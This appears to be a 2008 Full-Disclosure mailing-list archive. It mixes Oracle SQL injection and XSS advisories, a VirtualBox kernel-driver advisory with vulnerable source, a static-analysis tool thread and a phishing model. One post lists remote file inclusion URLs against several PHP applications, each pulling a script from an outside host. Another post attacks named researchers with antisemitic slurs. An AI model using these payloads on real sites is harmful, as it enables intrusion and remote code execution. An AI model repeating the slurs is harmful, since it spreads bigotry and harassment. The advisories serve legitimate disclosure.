3e65b363fad9bb0f9364d13312d438c1 http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_amd64.deb Size/MD5: 1222428 1ec764e382c763932d3485062f9d30a8 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_amd64.deb Size/MD5: 359272 22eda6f6103d5b22a7fd6734941ce57a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_i386.deb Size/MD5: 31736 3930e413a69542a6fe692da52e122bf6 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_i386.deb Size/MD5: 79106 7d4f9e0bca4834ffe03160a25fd5d915 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_i386.deb Size/MD5: 21908 4da4fbb4969b6f50dfdd970e6b330434 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_i386.deb Size/MD5: 1863560 670d52c0413ae0f34b7d515e75f35022 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_i386.deb Size/MD5: 545286 900c7fe883d5b0a134e6f562d91dfdff http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_i386.deb Size/MD5: 1192374 75f56b11566863c175d97f2015c8c4e0 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_i386.deb Size/MD5: 346632 08944188ce8e4e48b76f63c6bead71f9 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_lpia.deb Size/MD5: 16710 9eca7f0fe03d7555b777e2f3bbd69444 http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_lpia.deb Size/MD5: 92962 6ebfa49dcabb3d76a43c929d0ad9b86d http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_lpia.deb Size/MD5: 6708 1e479fcf05f054761cb6c5f645691272 http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_lpia.deb Size/MD5: 1881282 9acc6a2939b1a0f25d9957170fb2be0d http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_lpia.deb Size/MD5: 540030 f21b130d59e6765fcf62145741edfb31 http://ports.ubuntu.com/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_lpia.deb Size/MD5: 1187040 8b9a8b1a869b4126113c1a42144fa749 http://ports.ubuntu.com/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_lpia.deb Size/MD5: 347230 bb2cf6e1ffd5251a3fdc0ca040591720 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_powerpc.deb Size/MD5: 19474 c8238d336c7d5809ffd284e23e583258 http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_powerpc.deb Size/MD5: 101252 71fc2e25b914d62b9dcc84fa34a37bb5 http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_powerpc.deb Size/MD5: 6712 f02cac506dc419a8d6bbea10f17f6c31 http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_powerpc.deb Size/MD5: 1931954 959869f5deb73dc20ad999df7db6db29 http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_powerpc.deb Size/MD5: 576138 a07f45bdb84eda63783fda40635d12a8 http://ports.ubuntu.com/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_powerpc.deb Size/MD5: 1212598 1e1c5ab7e9e4e1ad45763faffc0e2d83 http://ports.ubuntu.com/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_powerpc.deb Size/MD5: 361420 7f1093eb894d3c55c8d15efd793ae451 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/a8d3d72b/attachment.bin From modversion at gmail.com Mon Aug 4 15:47:38 2008 From: modversion at gmail.com (modversion) Date: Mon, 4 Aug 2008 22:47:38 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ Message-ID: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> hi list: I want a free static analysis tool for c/c++ code in win32 platform,which do not need to compile the codes. I tried rats,its4 and flawfinder,but it seems that they can only found the dangerous functions like strcpy. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/2aa887bd/attachment.html From shatter at appsecinc.com Mon Aug 4 17:16:01 2008 From: shatter at appsecinc.com (Team SHATTER) Date: Mon, 04 Aug 2008 12:16:01 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Application Server (WWEXP_API_ENGINE) Message-ID: <48972B41.9070900@appsecinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Application Server (WWEXP_API_ENGINE) Audust 4, 2008 Risk Level: High Affected versions: Oracle Application Server 9.0.4.3, 10.1.2.2 and 10.1.4.1 Remote exploitable: Yes (No authentication required) Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: Oracle Application Server installs the PL/SQL package WWEXP_API_ENGINE owned by PORTAL in the backend Oracle database server. The 'ACTION' procedure of this package has an instance of SQL Injection that allows attackers to create anonymous PL/SQL programs and execute any kind of PL/SQL statements. The statements are executed with the privileges of the PORTAL user, that has DBA privileges. The vulnerability can be exploited using a web application and without authentication. Impact: Exploitation of this vulnerability allows an unauthenticated attacker on the Internet to gain full control of a backend Oracle database server via a vulnerable web site. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html Timeline: Vendor Notification - 1/3/2008 Vendor Response - 1/8/2008 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXK0EACgkQ9EOAcmTuFN0XTACfVffmDNUHutUYu0+5G5zks/tG m3cAn2pILpcdBbr1Rql7zwerfEjMi9m4 =72Cl -----END PGP SIGNATURE----- From shatter at appsecinc.com Mon Aug 4 17:42:30 2008 From: shatter at appsecinc.com (Team SHATTER) Date: Mon, 04 Aug 2008 12:42:30 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: Cross-site scripting in Oracle Enterprise Manager (REFRESHHOME Parameter) Message-ID: <48973176.2010505@appsecinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory Cross-site scripting in Oracle Enterprise Manager (REFRESHHOME Parameter) August 4, 2008 Risk Level: High Affected versions: Oracle Enterprise Manager Database Control 10gR1 and Oracle Enterprise Manager Grid Control 10gR1 Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user. The "REFRESHHOME" parameter used in web pages of Oracle Enterprise Manager are vulnerable to cross-site scripting attacks. User supplied input to these parameters is returned without proper sanitization, allowing a malicious attacker to inject arbitrary scripting code. Impact: Attackers might steal administrator's session cookies, thereby allowing the attacker to impersonate the valid user. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2590 Timeline: Vendor Notification - 8/24/2007 Vendor Response - 8/29/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMXYACgkQ9EOAcmTuFN2wVgCfbH8TPbl61Hm3ZMkqi8PoucEG buQAniGAyNuPJO5xdaJHRu8JCUX5lJxp =A8u7 -----END PGP SIGNATURE----- From shatter at appsecinc.com Mon Aug 4 17:43:27 2008 From: shatter at appsecinc.com (Team SHATTER) Date: Mon, 04 Aug 2008 12:43:27 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter) Message-ID: <489731AF.3040605@appsecinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter) August 4, 2008 Risk Level: High Affected versions: Oracle Enterprise Manager Database Control 10gR1, 10gR2 and 11g (11.1.0.6) Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user. The "REFRESHCHOICE" parameter used in web pages of Oracle Enterprise Manager are vulnerable to cross-site scripting attacks. User supplied input to these parameters is returned without proper sanitization, allowing a malicious attacker to inject arbitrary scripting code. Impact: Attackers might steal administrator's session cookies, thereby allowing the attacker to impersonate the valid user. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2603 Timeline: Vendor Notification - 12/27/2007 Vendor Response - 12/27/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMa8ACgkQ9EOAcmTuFN33twCfV6yidpr9eAmIbhvBTyY07uE6 RVIAoLKVCD5lsBM0IyksviVGbrhu1tlF =CyQi -----END PGP SIGNATURE----- From shatter at appsecinc.com Mon Aug 4 17:41:30 2008 From: shatter at appsecinc.com (Team SHATTER) Date: Mon, 04 Aug 2008 12:41:30 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) Message-ID: <4897313A.2030607@appsecinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) August 4, 2008 Risk Level: Medium Affected versions: Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1 Remote exploitable: Yes (Authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user. Impact: Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges. Vendor Status: Vendor was contacted and a patch was released. Workaround: Restrict access to the SYS.DBMS_DEFER_SYS package. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2592 Timeline: Vendor Notification - 9/24/2007 Vendor Response - 9/28/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMToACgkQ9EOAcmTuFN3LGQCeK6pvkshjrIqiw8rdmE8tWIdK O9sAnjeSiwasj2U7SpoPhQVvYKyYvUMI =X2Bp -----END PGP SIGNATURE----- From piercede at pdx.edu Mon Aug 4 20:16:50 2008 From: piercede at pdx.edu (Dean Pierce) Date: Mon, 04 Aug 2008 12:16:50 -0700 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> Message-ID: <489755A2.5000704@pdx.edu> Awesome! I hadn't realized that I could use fd to make requests also. I would like some quicktime 0day, some bitchin shellcode that makes all the windows melt away revealing the word "PWNT" in big red letters on a black background, and 3 gallons of chocolate milk. On a side note, lack of proper static analysis tools in the OSS community makes the baby jesus cry. - DEAN modversion wrote: > hi list: > I want a free static analysis tool for c/c++ code in win32 platform,which > do not need to compile the codes. > > I tried rats,its4 and flawfinder,but it seems that they can only found the > dangerous functions like strcpy. > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From kristo57 at mail.ru Mon Aug 4 21:26:49 2008 From: kristo57 at mail.ru (Kristo pher) Date: Tue, 05 Aug 2008 00:26:49 +0400 Subject: [Full-disclosure] New info tool available at freewebtown.com/sombra6/info.php now Message-ID: http://victim.com/members_awiz/rebuild.php?path_full=http://freewebtown.com/sombra6/info.php? http://victim.com/amember/plugins/db/mysql/mysql.inc.php?config[root_dir]=http://freewebtown.com/sombra6/info.php? http://victim.com/poll/admin/common.inc.php?base_path=http://freewebtown.com/sombra6/info.php? http://victim.com/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://freewebtown.com/sombra6/info.php? http://victim.com/index.php?file=http://freewebtown.com/sombra6/info.php? From thouth at gmail.com Tue Aug 5 01:28:02 2008 From: thouth at gmail.com (Fionnbharr) Date: Tue, 5 Aug 2008 10:28:02 +1000 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <489755A2.5000704@pdx.edu> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <489755A2.5000704@pdx.edu> Message-ID: <5ae653bf0808041728n7e5a4128n94e70881b20f2528@mail.gmail.com> http://www.eresi-project.org/ http://www.phrack.org/issues.html?issue=64&id=8#article Nice jokes Dean. Preeeetty funny. 2008/8/5 Dean Pierce : > Awesome! > I hadn't realized that I could use fd to make requests also. > > I would like some quicktime 0day, some bitchin shellcode that makes all > the windows melt away revealing the word "PWNT" in big red letters on a > black background, and 3 gallons of chocolate milk. > > On a side note, lack of proper static analysis tools in the OSS > community makes the baby jesus cry. > > - DEAN > > modversion wrote: >> hi list: >> I want a free static analysis tool for c/c++ code in win32 platform,which >> do not need to compile the codes. >> >> I tried rats,its4 and flawfinder,but it seems that they can only found the >> dangerous functions like strcpy. >> >> >> >> ------------------------------------------------------------------------ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From stuart at cyberdelix.net Tue Aug 5 02:03:22 2008 From: stuart at cyberdelix.net (lsi) Date: Tue, 05 Aug 2008 02:03:22 +0100 Subject: [Full-disclosure] phish war game Message-ID: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> BLUE TEAM: anti-phishing blacklist RED TEAM: phish GREEN TEAM: end-users starting degree of obfuscation: 0% (none) starting number of blocked domains: 0 ---------- round 1: action: RED sends billions of phish consequence: 5% of GREEN members are suckered and lose some cash action: BLUE blocks the top 20 phished domains using the FROM field consequence: 80% of RED members are forced to make new sites and find new victims current degree of obfuscation: 0% current number of blocked domains: 20 round 2: action: RED obfuscates their FROM fields by 20% and resends billions of phish consequence: 4% of GREEN members are suckered and lose some cash action: BLUE blocks the next top 20 phished domains using the FROM field consequence: 80% of RED members are forced to make new sites and find new victims current degree of obfuscation: 20% current number of blocked domains: 40 round 3: action: RED obfuscates their FROM fields by 20% and resends billions of phish consequence: 3% of GREEN members are suckered and lose some cash action: BLUE blocks the next top 20 phished domains using the FROM field consequence: 80% of RED members are forced to make new sites and find new victims current degree of obfuscation: 24% current number of blocked domains: 60 round 4: action: RED obfuscates their FROM fields by 20% and resends billions of phish consequence: 2% of GREEN members are suckered and lose some cash action: BLUE blocks the next top 20 phished domains using the FROM field consequence: 80% of RED members are forced to make new sites and find new victims current degree of obfuscation: 28.8% current number of blocked domains: 80 round 5: action: RED obfuscates their FROM fields by 20% and resends billions of phish consequence: 1% of GREEN members are suckered and lose some cash action: BLUE blocks the next top 20 phished domains using the FROM field consequence: 80% of RED members are forced to make new sites and find new victims current degree of obfuscation: 34.56% current number of blocked domains: 100 round 6: action: RED obfuscates their FROM fields by 20% and resends billions of phish consequence: 0% of GREEN members are suckered and lose some cash ---------- GAME OVER: RED loses at round 6, as 0% of GREEN members are suckered, due to over-obfuscation. final degree of obfuscation: 41.47% final number of blocked domains: 100 ---------- observations: 1. The model is over-simplified, in reality it's unlikely that BLUE would consistently achieve 80%. However in reality it's also unlikely that RED would enjoy a linear relationship between obfuscation and success, specifically, the more RED obfuscates the less success it has. Both teams might suffer diminishing returns from their efforts. (for the purposes of the above model, these effects have been allowed to cancel each other out) 2. The model has a constant 1% reduction in the victim rate, this is debatable, however it will never go upwards, eg., there is nothing RED can do to push that number back towards 100%. Conversely, everything BLUE does pushes that number towards 0%. In addition, other anti-phishing technologies will also be pushing the number towards 0%. GREEN itself might even push the number down. 3. The model does not allow RED to increase the number of phish they send. In reality, they way well do so. However they will blocked faster in this case, not only by BLUE but also by other technologies, such as spam filters. (for the purposes of the above model, these effects have been allowed to cancel each other out) 4. The model does not allow the game to be terminated voluntarily. In reality, RED will terminate the game voluntarily when phish revenue per hour falls below revenues per hour available from other sources. This will be some time before 0% of GREEN members are suckered, perhaps as early as round 3. 5. The blacklist contains 100 items at the time RED loses. It may contain as little as 60 at the time RED terminates voluntarily. ---------- links: (...) http://en.wikipedia.org/wiki/Business_War_Games (this is a sales brochure, however it describes a war game a bit nicer than wiki, it's got diagrams, for a start) http://www.coleago.co.uk/uploads/Training/War%20Gaming.pdf (this isn't relevant to a war game, it might be something like what's happening when the top 20 phished domains are used to select the items to blacklist, OTOH, it might not, I don't know, I'm not a statistician. I'd love to know the name of the technique, I use something similar to optimise my spam rules...) http://en.wikipedia.org/wiki/Monte_Carlo_method (this was mentioned in one of the papers I quoted previously) http://en.wikipedia.org/wiki/Pareto_principle --- Stuart Udall stuart at at cyberdelix.dot net - http://www.cyberdelix.net/ --- * Origin: lsi: revolution through evolution (192:168/0.2) From modversion at gmail.com Tue Aug 5 04:30:19 2008 From: modversion at gmail.com (modversion) Date: Tue, 5 Aug 2008 11:30:19 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <5ae653bf0808041728n7e5a4128n94e70881b20f2528@mail.gmail.com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <489755A2.5000704@pdx.edu> <5ae653bf0808041728n7e5a4128n94e70881b20f2528@mail.gmail.com> Message-ID: <002801c8f6ab$9890b500$c9b21f00$@com> Hi Fionnbharr: Thanks for your suggestion?But what I really need is a SOURCE CODE static analysis tool :( Would you like to be kind enough to show me something others for the source code. -----Original Message----- From: Fionnbharr [mailto:thouth at gmail.com] Sent: Tuesday, August 05, 2008 8:28 AM To: Dean Pierce Cc: modversion; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] free static analysis tool for c/c++ http://www.eresi-project.org/ http://www.phrack.org/issues.html?issue=64&id=8#article Nice jokes Dean. Preeeetty funny. 2008/8/5 Dean Pierce : > Awesome! > I hadn't realized that I could use fd to make requests also. > > I would like some quicktime 0day, some bitchin shellcode that makes > all the windows melt away revealing the word "PWNT" in big red letters > on a black background, and 3 gallons of chocolate milk. > > On a side note, lack of proper static analysis tools in the OSS > community makes the baby jesus cry. > > - DEAN > > modversion wrote: >> hi list: >> I want a free static analysis tool for c/c++ code in win32 >> platform,which do not need to compile the codes. >> >> I tried rats,its4 and flawfinder,but it seems that they can only >> found the dangerous functions like strcpy. >> >> >> >> --------------------------------------------------------------------- >> --- >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From rholgstad at gmail.com Tue Aug 5 06:26:03 2008 From: rholgstad at gmail.com (Robert Holgstad) Date: Tue, 5 Aug 2008 00:26:03 -0500 Subject: [Full-disclosure] more rehashes of xss & 'evil gif' Message-ID: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html seems dan isn't the only press whore around! rebouncing from his embarasing post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work hes done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers after you by the end of business day. once again we would ilke to thank nate for his cutting edge research and hopefully he will get nommed for next years pwnie life time acheivement award! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/8be82dda/attachment.html From spreadlulzandwar at gmail.com Tue Aug 5 07:12:22 2008 From: spreadlulzandwar at gmail.com (raining lulz) Date: Tue, 5 Aug 2008 02:12:22 -0400 Subject: [Full-disclosure] more rehashes of xss & 'evil gif' In-Reply-To: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> References: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> Message-ID: <418a7b2c0808042312m632ce57cu9d4b58012b278262@mail.gmail.com> Clearly this class of vulnerabilities is nothing short of epic, entirely new, and truly worth our time and fear. When combined with the stellar research and presentation skills of said researchers it meets 3/4 requirements for widespread media cuntbaggery, observe: 1) words that sound new and cool -->"The attack relies on a new type of hybrid file" hybrid: hybrid, hmm sort of hydra, sort of like internet super worm of doom??!! watchout! 2)social networking sites -->"giving the bad guys access to the victim's Facebook account." zomgz did someone say facebook? watch out, your teenage whore daughter is now at risk! 3)moderately not clever acronym -->"They call this type of file a GIFAR, a contraction of GIF and JAR" plus it sounds like some sort of mythical beast?! GIFAR, ROAR! do you think they'll have a cool animation for it on their slides? one can only dream! wait, what about the 4th requirement? how about the possibility of anyone actually being owned? wait, no. On Tue, Aug 5, 2008 at 1:26 AM, Robert Holgstad wrote: > > http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html > > seems dan isn't the only press whore around! rebouncing from his embarasing > post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his > crew of javascript gurus have whipped up another rehash of an old class of > bugs that has been used in the wild for a long time. we personally want to > thank nate for his great work hes done for conferences over the years > filling up their talking spots with useless crap. his work is only rivaled > by gadi evron who gets accepted to every conference because declining a fat > AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers > after you by the end of business day. > > once again we would ilke to thank nate for his cutting edge research and > hopefully he will get nommed for next years pwnie life time acheivement > award! > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/06400e14/attachment.html From advisories at coresecurity.com Mon Aug 4 21:38:32 2008 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Mon, 04 Aug 2008 17:38:32 -0300 Subject: [Full-disclosure] CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability Message-ID: <489768C8.5060701@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability *Advisory Information* Title: Sun xVM VirtualBox Privilege Escalation Vulnerability Advisory ID: CORE-2008-0716 Advisory URL: http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability Date published: 2008-08-04 Date of last update: 2008-08-04 Vendors contacted: Sun Microsystems Release mode: Coordinated release *Vulnerability Information* Class: Insufficient input validation Remotely Exploitable: No Locally Exploitable: Yes Bugtraq ID: 30481 CVE Name: CVE-2008-3431 *Vulnerability Description* Virtualization technologies allow users to run different operating systems simultaneously on top of the same set of underlying physical hardware. This provides several benefits to end users and organizations, including efficiency gains in the use of hardware resources, reduction of operational costs, dynamic re-allocation of computing resources and rapid deployment and configuration of software development and testing environments. VirtualBox is an open source virtualization technology project originally developed by Innotek, a software company based in Germany. In February 2008 Sun Microsystems announced the acquisition of Innotek [1] and VirtualBox was integrated into Sun's xVM family of virtualization technologies. In May 2008, Sun Microsystems announced that the number of downloads of the open source VirtualBox software package passed the five million mark [2]. When used on a Windows Host Operating System VirtualBox installs a kernel driver ('VBoxDrv.sys') to control virtualization of guest Operating Systems. An input validation vulnerability was discovered within VirtualBox's 'VBoxDrv.sys' driver that could allow an attacker, with local but un-privileged access to a host where VirtualBox is installed, to execute arbitrary code within the kernel of the Windows host operating system and to gain complete control of a vulnerable computer system. *Vulnerable Packages* . Sun xVM VirtualBox 1.6.2. . Sun xVM VirtualBox 1.6.0. . This issue only occurs in the Microsoft Windows versions of xVM VirtualBox. *Non-vulnerable Packages* . Sun xVM VirtualBox 1.6.4 (for Microsoft Windows) *Vendor Information, Solutions and Workarounds* No workarounds exist for this issue. A security bulletin from the vendor that describes this issue is available here: http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1. *Credits* This vulnerability was discovered and researched by Anibal Sacco from the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. *Technical Description / Proof of Concept Code* When the VirtualBox package is installed on a host the 'VBoxDrv.sys' driver is loaded on the machine. This driver allows any unprivileged user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering mode of METHOD_NEITHER without any kind of validation. This allows untrusted user mode code to pass arbitrary kernel addresses as arguments to the driver. With specially constructed input, a malicious user can use functionality within the driver to patch kernel addresses and execute arbitrary code in kernel mode. When handling IOCTLs a communication method must be pre-defined between the user-mode application and the driver module. The selected method will determine how the I/O Manager manipulates memory buffers used in the communication. The 'METHOD_NEITHER' is a very dangerous method because the pointer passed to 'DeviceIoControl' as input or output buffer will be sent directly to the driver, thus transferring it the responsibility of doing the proper checks to validate the addresses sent from user mode. The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method when handling IOCTLs request and does not validate properly the buffer sent in the Irp object allowing an attacker to write to any memory address in the kernel-mode. Let's see the bug on the source. This is the function used to handle the IOCTL requests at 'SUPDrv-win.cpp'. /----------- NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP pIrp) { PSUPDRVDEVEXT pDevExt = (PSUPDRVDEVEXT)pDevObj->DeviceExtension; PIO_STACK_LOCATION pStack = IoGetCurrentIrpStackLocation(pIrp); PSUPDRVSESSION pSession = (PSUPDRVSESSION)pStack->FileObject->FsContext; /* * Deal with the two high-speed IOCtl that takes it's arguments from * the session and iCmd, and only returns a VBox status code. */ ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode; if ( ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN (1) || ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN || ulCmd == SUP_IOCTL_FAST_DO_NOP) { KIRQL oldIrql; int rc; /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from rescheduling us to another CPU/core. */ Assert(KeGetCurrentIrql() <= DISPATCH_LEVEL); KeRaiseIrql(DISPATCH_LEVEL, &oldIrql); (2) rc = supdrvIOCtlFast(ulCmd, pDevExt, pSession); KeLowerIrql(oldIrql); /* Complete the I/O request. */ NTSTATUS rcNt = pIrp->IoStatus.Status = STATUS_SUCCESS; pIrp->IoStatus.Information = sizeof(rc); __try { (3) *(int *)pIrp->UserBuffer = rc; } __except(EXCEPTION_EXECUTE_HANDLER) { rcNt = pIrp->IoStatus.Status = GetExceptionCode(); dprintf(("VBoxSupDrvDeviceContorl: Exception Code %#x\n", rcNt)); } IoCompleteRequest(pIrp, IO_NO_INCREMENT); return rcNt; } return 